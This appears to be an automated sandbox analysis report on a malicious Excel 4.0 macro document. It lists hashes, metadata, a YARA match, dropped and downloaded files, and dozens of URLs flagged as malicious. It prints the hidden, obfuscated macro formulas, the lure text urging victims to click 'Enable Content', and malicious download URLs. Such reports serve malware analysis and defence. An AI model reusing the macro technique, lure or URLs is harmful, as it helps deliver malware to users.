da1c4f936734

C:\Users\RDhJ0CNFevzX\Desktop\WWtobner46F3ZaHf.xls

Sample File

Excel Document

»

MIME Type	application/vnd.ms-excel
File Size	80.50 KB
MD5	8d0b1f9bbf3b03c39d1a277962ebcb4f
SHA1	ab8d3f5de114ac1c1920c41858b7c50d7922bc49
SHA256	da1c4f9367347abcd2e2b908d4aa475ce8a84e713469a0622d49278f18f10d57
SSDeep	1536:ROOKpb8rGYrMPe3q7Q0XV5xtezEsi8/dgFQHuS4VcTO9/r7UYdEJeFK:RBKpb8rGYrMPe3q7Q0XV5xtezEsi8/dn
ImpHash	-
Static Analysis Parser Error	invalid formula sequence: 0x35

File Reputation Information

»

Verdict	Malicious
Names	Mal/Generic-S

Office Information

»

Creator	Dream
Last Modified By	RHRSDJTJDGHT
Create Time	2015-06-05 20:19 (UTC+2)
Modify Time	2022-06-15 16:32 (UTC+2)
Codepage	ANSI_Cyrillic
Application	Microsoft Excel
App Version	16.0
Document Security	NONE
Листы	5
Макросы Excel 4.0	1
Titles Of Parts	Sheet, EGASG, OEGOGUOUG, ERGN, gkyy, LGSHSRLHRH
scale_crop	False
shared_doc	False

Controls (1)

»

CLSID	Control Name	Associated Vulnerability
{00020820-0000-0000-C000-000000000046}	Excel97Sheet	-

Excel 4.0 Macros (1)

»

Macro #1: LGSHSRLHRH

»

Visibility State HIDDEN


                                                                     G:20 =FORMULA()=FORMULA(EGASG!L24&EGASG!L26&EGASG!L27&EGASG!L28&EGASG!L28&OEGOGUOUG!N7&OEGOGUOUG!C3&EGASG!F10&OEGOGUOUG!R11&gkyy!D10&OEGOGUOUG!E24&ERGN!J8&gkyy!G4&ERGN!E13,G23)=FORMULA(EGASG!L24&EGASG!G8&EGASG!F4&EGASG!G8&EGASG!O3&EGASG!L30&EGASG!F24&EGASG!L26&ERGN!G2&ERGN!P7&EGASG!A4&ERGN!O19&EGASG!A4&ERGN!C19&EGASG!F10&ERGN!H21&ERGN!B5&gkyy!G4&EGASG!F24&EGASG!L31,G25)=FORMULA(EGASG!L24&EGASG!L26&EGASG!L27&EGASG!L28&EGASG!L28&OEGOGUOUG!N7&OEGOGUOUG!C3&EGASG!F10&OEGOGUOUG!R11&gkyy!D10&OEGOGUOUG!F26&ERGN!J8&gkyy!I8&ERGN!E13,G27)=FORMULA(EGASG!L24&EGASG!G8&EGASG!F4&EGASG!G8&EGASG!O3&EGASG!L30&EGASG!F24&EGASG!L26&ERGN!G2&ERGN!P7&EGASG!A4&ERGN!O19&EGASG!A4&ERGN!C19&EGASG!F10&ERGN!H21&ERGN!B5&gkyy!I8&EGASG!F24&EGASG!L31,G29)=FORMULA(EGASG!L24&EGASG!L26&EGASG!L27&EGASG!L28&EGASG!L28&OEGOGUOUG!N7&OEGOGUOUG!C3&EGASG!F10&OEGOGUOUG!R11&gkyy!D10&OEGOGUOUG!G24&ERGN!J8&gkyy!P16&ERGN!E13,G31)=FORMULA(EGASG!L24&EGASG!G8&EGASG!F4&EGASG!G8&EGASG!O3&EGASG!L30&EGASG!F24&EGASG!L26&ERGN!G2&ERGN!P7&EGASG!A4&ERGN!O19&EGASG!A4&ERGN!C19&EGASG!F10&ERGN!H21&ERGN!B5&gkyy!P16&EGASG!F24&EGASG!L31,G33)=FORMULA(EGASG!L24&EGASG!L26&EGASG!L27&EGASG!L28&EGASG!L28&OEGOGUOUG!N7&OEGOGUOUG!C3&EGASG!F10&OEGOGUOUG!R11&gkyy!D10&OEGOGUOUG!H26&ERGN!J8&gkyy!C19&ERGN!E13,G35)=FORMULA(EGASG!L24&EGASG!G8&EGASG!F4&EGASG!G8&EGASG!O3&EGASG!L30&EGASG!F24&EGASG!L26&ERGN!G2&ERGN!P7&EGASG!A4&ERGN!O19&EGASG!A4&ERGN!C19&EGASG!F10&ERGN!H21&ERGN!B5&gkyy!C19&EGASG!F24&EGASG!L31,G37)=FORMULA(EGASG!L24&EGASG!G44&EGASG!H46&EGASG!J44,G44)

Extracted Image Texts (1)

»

Image #1: 0.JPG

»

                     Most features are disabled. To view and edit document click Enable Editing and click Enable Content.
                    

CFB Streams (3)

»

Name	ID	Size	Actions
Root\Workbook	1	70.06 KB	... Actions Download File
Root\SummaryInformation	2	4.00 KB	... Actions Download File
Root\DocumentSummaryInformation	3	4.00 KB	... Actions Download File

YARA Matches (1)

»

Rule Name	Rule Description	Classification	Score	Actions
Document_Office_VeryHiddenMacro	Document contains very hidden Excel 4.0 macro	-	2/5	... Actions Show Ruleset Show Match

c:\users\rdhj0cnfevzx\appdata\roaming\microsoft\excel\9b421100

Dropped File

Empty

»

MIME Type	application/x-empty
File Size	0 Bytes (not extracted)
MD5	d41d8cd98f00b204e9800998ecf8427e
SHA1	da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256	e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SSDeep	3::
ImpHash	-

a7e96a0d3e048bacde917aea9b046502b2025975938d64229e90f3415c6fe227

Downloaded File

HTML

»

MIME Type	text/html
File Size	91.94 KB
MD5	d510b97ef4f2d8a5d1353ca1671f0f72
SHA1	dcdeb2e2de0956e28cc12994a297444ad99cc7bf
SHA256	a7e96a0d3e048bacde917aea9b046502b2025975938d64229e90f3415c6fe227
SSDeep	1536:F9GjYAQbfdfAapbEd4eI1LgP9ijxVMbITWf4+9aoImdb+bTLQa2:F9/Rfc4eI1LguWf4+9aPmdb+bTN2
ImpHash	-
Static Analysis Parser Error	HTML parser encountered errors

Extracted URLs (66)

»

URL	WHOIS Data	Reputation Status	Recursively Submitted	Actions
https://chasingmavericks.co.ke/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend-gtag.min.js?ver=9.0.1	Show WHOIS	Malicious	-	... Actions Show URL Submit URL
https://chasingmavericks.co.ke/wp-content/plugins/header-footer-elementor/inc/js/frontend.js?ver=1.6.41	Show WHOIS	Malicious	-	... Actions Show URL Submit URL
https://fonts.googleapis.com/css?family=Noto+Sans%3A400%2C700%7CMontserrat%3A700%2C&display=fallback&ver=3.7.2	Show WHOIS	Not Available	-	... Actions Show URL Submit URL
https://chasingmavericks.co.ke/wp-content/plugins/header-footer-elementor/inc/widgets-css/frontend.css?ver=1.6.41	Show WHOIS	Malicious	-	... Actions Show URL Submit URL
https://chasingmavericks.co.ke/wp-content/plugins/essential-addons-for-elementor-lite/assets/front-end/js/view/general.min.js?ver=6.0.2	Show WHOIS	Malicious	-	... Actions Show URL Submit URL
https://fonts.googleapis.com/css?family=Roboto%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7CRoboto+Slab%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7CMontserrat%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic&display=auto&ver=6.7	Show WHOIS	Not Available	-	... Actions Show URL Submit URL
https://chasingmavericks.co.ke/wp-content/plugins/header-footer-elementor/assets/css/header-footer-elementor.css?ver=1.6.41	Show WHOIS	Malicious	-	... Actions Show URL Submit URL
https://chasingmavericks.co.ke/wp-includes/css/dist/block-library/style.min.css?ver=b24fb6e0488f778d0dfa371dfc3bbd2c	Show WHOIS	Malicious	-	... Actions Show URL Submit URL
https://chasingmavericks.co.ke/expertise/	Show WHOIS	Malicious	-	... Actions Show URL Submit URL
https://chasingmavericks.co.ke/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1	Show WHOIS	Malicious	-	... Actions Show URL Submit URL
https://chasingmavericks.co.ke/wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min.js?ver=4.0.2	Show WHOIS	Malicious	-	... Actions Show URL Submit URL
https://chasingmavericks.co.ke/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.23.4	Show WHOIS	Malicious	-	... Actions Show URL Submit URL
https://chasingmavericks.co.ke/about/	Show WHOIS	Malicious	-	... Actions Show URL Submit URL
https://chasingmavericks.co.ke/events/	Show WHOIS	Malicious	-	... Actions Show URL Submit URL
https://chasingmavericks.co.ke/projects/	Show WHOIS	Malicious	-	... Actions Show URL Submit URL
https://chasingmavericks.co.ke/feed/	Show WHOIS	Malicious	-	... Actions Show URL Submit URL
https://chasingmavericks.co.ke/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.css?ver=5.15.3	Show WHOIS	Malicious	-	... Actions Show URL Submit URL
https://chasingmavericks.co.ke/wp-content/themes/astra/assets/js/minified/frontend.min.js?ver=3.7.2	Show WHOIS	Malicious	-	... Actions Show URL Submit URL
https://fonts.gstatic.com	Show WHOIS	Not Available	-	... Actions Show URL Submit URL
https://gmpg.org/xfn/11	Show WHOIS	Not Available	-	... Actions Show URL Submit URL
https://chasingmavericks.co.ke/wp-content/plugins/elementor/assets/lib/font-awesome/js/v4-shims.min.js?ver=3.23.4	Show WHOIS	Malicious	-	... Actions Show URL Submit URL
https://chasingmavericks.co.ke/wp-json/	Show WHOIS	Malicious	-	... Actions Show URL Submit URL
https://chasingmavericks.co.ke/wp-content/plugins/elementor/assets/lib/swiper/v8/css/swiper.min.css?ver=8.4.5	Show WHOIS	Malicious	-	... Actions Show URL Submit URL
https://chasingmavericks.co.ke/wp-content/plugins/sticky-header-effects-for-elementor/assets/css/she-header-style.css?ver=1.6.11	Show WHOIS	Malicious	-	... Actions Show URL Submit URL
https://chasingmavericks.co.ke/pr/	Show WHOIS	Malicious	-	... Actions Show URL Submit URL
https://chasingmavericks.co.ke/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?ver=5.30.0	Show WHOIS	Malicious	-	... Actions Show URL Submit URL
https://s.w.org//images//core//emoji//15.0.3//svg//	Show WHOIS	Not Available	-	... Actions Show URL Submit URL
https://chasingmavericks.co.ke/wp-includes/js/jquery/ui/core.min.js?ver=1.13.3	Show WHOIS	Malicious	-	... Actions Show URL Submit URL
https://chasingmavericks.co.ke/wp-content/uploads/2024/04/cropped-COLORED-TRANSPARENT-192x192.png	Show WHOIS	Malicious	-	... Actions Show URL Submit URL
https://chasingmavericks.co.ke/wp-includes/js/dist/dom-ready.min.js?ver=f77871ff7694fffea381	Show WHOIS	Malicious	-	... Actions Show URL Submit URL
https://www.facebook.com/tr?id=1135335550583043&ev=PageView&noscript=1	Show WHOIS	Not Available	-	... Actions Show URL Submit URL
https://connect.facebook.net/en_US/fbevents.js?v=next	Show WHOIS	Not Available	-	... Actions Show URL Submit URL
https://chasingmavericks.co.ke/wp-content/uploads/2024/04/COLORED-TRANSPARENT.png	Show WHOIS	Malicious	-	... Actions Show URL Submit URL
http://fonts.googleapis.com	Show WHOIS	Not Available	-	... Actions Show URL Submit URL
https://chasingmavericks.co.ke/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.min.css?ver=5.15.3	Show WHOIS	Malicious	-	... Actions Show URL Submit URL
https://chasingmavericks.co.ke	Show WHOIS	Malicious	-	... Actions Show URL Submit URL
https://chasingmavericks.co.ke/wp-content/plugins/sticky-header-effects-for-elementor/assets/js/she-header.js?ver=1.6.11	Show WHOIS	Malicious	-	... Actions Show URL Submit URL
https://chasingmavericks.co.ke/wp-content/plugins/astra-sites/inc/lib/onboarding/assets/dist/template-preview/main.js?ver=06758d4d807d9d22c6ea	Show WHOIS	Malicious	-	... Actions Show URL Submit URL
https://chasingmavericks.co.ke/wp-content/plugins/essential-addons-for-elementor-lite/assets/front-end/css/view/general.min.css?ver=6.0.2	Show WHOIS	Malicious	-	... Actions Show URL Submit URL
https://chasingmavericks.co.ke/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.23.4	Show WHOIS	Malicious	-	... Actions Show URL Submit URL
https://chasingmavericks.co.ke/wp-content/uploads/2024/04/cropped-COLORED-TRANSPARENT-180x180.png	Show WHOIS	Malicious	-	... Actions Show URL Submit URL
https://chasingmavericks.co.ke//wp-admin//admin-ajax.php	Show WHOIS	Malicious	-	... Actions Show URL Submit URL
https://chasingmavericks.co.ke//wp-content//plugins//elementor//assets//	Show WHOIS	Malicious	-	... Actions Show URL Submit URL
https://chasingmavericks.co.ke	Show WHOIS	Malicious	-	... Actions Show URL Submit URL
https://chasingmavericks.co.ke/wp-content/plugins/elementor/assets/css/frontend-lite.min.css?ver=3.23.4	Show WHOIS	Malicious	-	... Actions Show URL Submit URL
http://www.googletagmanager.com/gtag/js?id=G-0DMBWV97S6	Show WHOIS	Not Available	-	... Actions Show URL Submit URL
https://chasingmavericks.co.ke/wp-content/plugins/wp-smushit/app/assets/js/smush-lazy-load.min.js?ver=3.16.6	Show WHOIS	Malicious	-	... Actions Show URL Submit URL
https://chasingmavericks.co.ke/capacity_building/	Show WHOIS	Malicious	-	... Actions Show URL Submit URL
https://chasingmavericks.co.ke/wp-content/plugins/elementor/assets/lib/font-awesome/css/regular.min.css?ver=5.15.3	Show WHOIS	Malicious	-	... Actions Show URL Submit URL
https://chasingmavericks.co.ke/wp-content/uploads/elementor/css/post-442.css?ver=1691599417	Show WHOIS	Malicious	-	... Actions Show URL Submit URL
https://chasingmavericks.co.ke/wp-content/uploads/2024/04/cropped-COLORED-TRANSPARENT-32x32.png	Show WHOIS	Malicious	-	... Actions Show URL Submit URL
https://chasingmavericks.co.ke/wp-content/themes/astra/assets/css/minified/frontend.min.css?ver=3.7.2	Show WHOIS	Malicious	-	... Actions Show URL Submit URL
https://chasingmavericks.co.ke/wp-content/plugins/elementor/assets/lib/font-awesome/css/all.min.css?ver=3.23.4	Show WHOIS	Malicious	-	... Actions Show URL Submit URL
https://chasingmavericks.co.ke//wp-includes//js//wp-emoji-release.min.js?ver=b24fb6e0488f778d0dfa371dfc3bbd2c	Show WHOIS	Malicious	-	... Actions Show URL Submit URL
https://chasingmavericks.co.ke//agendaafrikadebates.co.ke//QznOFMKV9R//	Show WHOIS	Malicious	-	... Actions Show URL Submit URL
https://s.w.org//images//core//emoji//15.0.3//72x72//	Show WHOIS	Not Available	-	... Actions Show URL Submit URL
https://chasingmavericks.co.ke/wp-content/plugins/elementor/assets/lib/font-awesome/css/v4-shims.min.css?ver=3.23.4	Show WHOIS	Malicious	-	... Actions Show URL Submit URL
https://chasingmavericks.co.ke/wp-includes/js/jquery/jquery.min.js?ver=3.7.1	Show WHOIS	Malicious	-	... Actions Show URL Submit URL
https://chasingmavericks.co.ke/xmlrpc.php?rsd	Show WHOIS	Malicious	-	... Actions Show URL Submit URL
https://chasingmavericks.co.ke/wp-content/uploads/elementor/css/post-1146.css?ver=1725335109	Show WHOIS	Malicious	-	... Actions Show URL Submit URL
https://chasingmavericks.co.ke/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.23.4	Show WHOIS	Malicious	-	... Actions Show URL Submit URL
https://chasingmavericks.co.ke/research-data-collection/	Show WHOIS	Malicious	-	... Actions Show URL Submit URL
https://chasingmavericks.co.ke/comments/feed/	Show WHOIS	Malicious	-	... Actions Show URL Submit URL
https://chasingmavericks.co.ke/contact/	Show WHOIS	Malicious	-	... Actions Show URL Submit URL
https://chasingmavericks.co.ke/cm-hub/	Show WHOIS	Malicious	-	... Actions Show URL Submit URL
https://chasingmavericks.co.ke	Show WHOIS	Malicious	-	... Actions Show URL Submit URL

0337734fe257adcbac0c7aa8133ffbb1e7f56a1a90204daae3bd12107df942d9

Downloaded File

HTML

»

MIME Type	text/html
File Size	9.85 KB
MD5	435f1e3b5ff7e067bb1d3d64d73847d0
SHA1	c357a865ce653d1cfc1a4c5e01e42b378cf07b69
SHA256	0337734fe257adcbac0c7aa8133ffbb1e7f56a1a90204daae3bd12107df942d9
SSDeep	192:HKHdBT2etVQvUIs41KPHqcJKeChbkbx69BFnEoqcI:HKdBnDMjhbWxcEoq
ImpHash	-

Extracted URLs (3)

»

URL	WHOIS Data	Reputation Status	Recursively Submitted	Actions
https://www.one.com/resend-verification.do?domain=DOMAIN_PLACEHOLDER	Show WHOIS	Not Available	-	... Actions Show URL Submit URL
https://fonts.googleapis.com/css?family=Open+Sans:400,300	Show WHOIS	Not Available	-	... Actions Show URL Submit URL
https://one.com	Show WHOIS	Not Available	-	... Actions Show URL Submit URL

c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\counters.dat

Modified File

Stream

»

MIME Type	application/octet-stream
File Size	128 Bytes
MD5	cc90851958032b8c8bbb7b24ec6271dd
SHA1	e027ad2ea4049374a3b01af2e3626b667dc816bc
SHA256	c2d814a34b184b7cdf10e4e7a4311ff15db99326d6dd8d328b53bf9e19ccf858
SSDeep	3:Fl:
ImpHash	-

0.JPG

Extracted File

Image

»

Parent File	C:\Users\RDhJ0CNFevzX\Desktop\WWtobner46F3ZaHf.xls
MIME Type	image/jpeg
File Size	28.67 KB
MD5	bd3fec9576a3750afdbe4b5e176bb9a2
SHA1	ba209aea8e2609831d36cde4ecc39b6bd5cbab85
SHA256	134db74c5397b3acd1db5c9662beeba7560174480be1209fb8936b3cc77bd384
SSDeep	768:8Hu4o/jyhPwuK7xB9pCUSJ7/vX5xCWUYdEdj2Puql:8HuS4ucTO9/v7UYdEJ2v
ImpHash	-

There are no files for this filter

There are no files in this analysis

Classifications

Threat Names

Before

After

WHOIS Domain Information